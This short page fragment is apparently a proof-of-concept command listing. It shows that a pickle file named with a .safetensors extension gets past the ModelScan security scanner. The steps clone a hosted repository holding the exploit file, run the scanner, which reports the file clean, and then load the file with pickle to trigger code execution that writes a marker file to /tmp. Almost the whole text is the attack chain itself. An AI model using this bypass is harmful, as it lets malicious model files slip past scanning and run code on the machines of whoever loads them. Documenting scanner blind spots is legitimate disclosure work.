Views
No views yet
.safetensors extension blind spot.1git clone https://huggingface.co/xiaoyaoyou2/modelscan-bypass-safetensors
2cd modelscan-bypass-safetensors
3
4# ModelScan says it's clean
5modelscan -p rce-exploit.safetensors
6
7# But it's actually RCE
8python3 -c "import pickle; pickle.load(open('rce-exploit.safetensors','rb'))"
9cat /tmp/pwned.txt # Should show uid=...